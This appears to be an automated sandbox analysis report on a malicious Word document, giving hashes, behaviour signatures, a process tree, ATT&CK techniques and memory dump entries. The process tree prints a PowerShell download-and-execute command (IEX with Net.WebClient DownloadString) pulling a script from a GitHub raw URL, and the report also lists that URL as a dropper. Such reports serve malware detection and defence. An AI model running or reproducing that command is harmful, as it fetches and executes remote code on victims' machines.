Analysis

  • max time kernel
    113s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    20-05-2022 22:42

General

  • Target

    1aca62502efabd340036a0f74f46e03dab633a0d12497b5456590d329fffba6a.doc

  • Size

    40KB

  • MD5

    9b7212f54d8460d8144f65d1f644bb13

  • SHA1

    3c2eaba89eab872ee549f22f08fdb83e0a34ad99

  • SHA256

    1aca62502efabd340036a0f74f46e03dab633a0d12497b5456590d329fffba6a

  • SHA512

    a5db7be20fdde31a2f329ce27c60036516cf7e13418bb30a4c66a872d12061b74438dbad25ce461e0424a0eb412035e8001a61624f40d46c29ac69ec4cd2d595

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/scriptsample/mal/master/cs-test.ps1

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1aca62502efabd340036a0f74f46e03dab633a0d12497b5456590d329fffba6a.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1960
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/scriptsample/mal/master/cs-test.ps1');"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1236
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1984

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Command and Control

    Web Service

    1
    T1102

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1236-65-0x0000000000000000-mapping.dmp
    • memory/1236-70-0x0000000004C90000-0x00000000052E1000-memory.dmp
      Filesize

      6.3MB

    • memory/1236-67-0x000000006AE10000-0x000000006B3BB000-memory.dmp
      Filesize

      5.7MB

    • memory/1960-58-0x00000000714FD000-0x0000000071508000-memory.dmp
      Filesize

      44KB

    • memory/1960-64-0x00000000006F5000-0x00000000006F9000-memory.dmp
      Filesize

      16KB

    • memory/1960-60-0x00000000006F5000-0x00000000006F9000-memory.dmp
      Filesize

      16KB

    • memory/1960-59-0x00000000006F5000-0x00000000006F9000-memory.dmp
      Filesize

      16KB

    • memory/1960-61-0x00000000006F5000-0x00000000006F9000-memory.dmp
      Filesize

      16KB

    • memory/1960-62-0x00000000006F5000-0x00000000006F9000-memory.dmp
      Filesize

      16KB

    • memory/1960-63-0x00000000006F5000-0x00000000006F9000-memory.dmp
      Filesize

      16KB

    • memory/1960-54-0x0000000072A91000-0x0000000072A94000-memory.dmp
      Filesize

      12KB

    • memory/1960-57-0x0000000075381000-0x0000000075383000-memory.dmp
      Filesize

      8KB

    • memory/1960-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1960-71-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1960-55-0x0000000070511000-0x0000000070513000-memory.dmp
      Filesize

      8KB

    • memory/1984-69-0x000007FEFBFA1000-0x000007FEFBFA3000-memory.dmp
      Filesize

      8KB

    • memory/1984-68-0x0000000000000000-mapping.dmp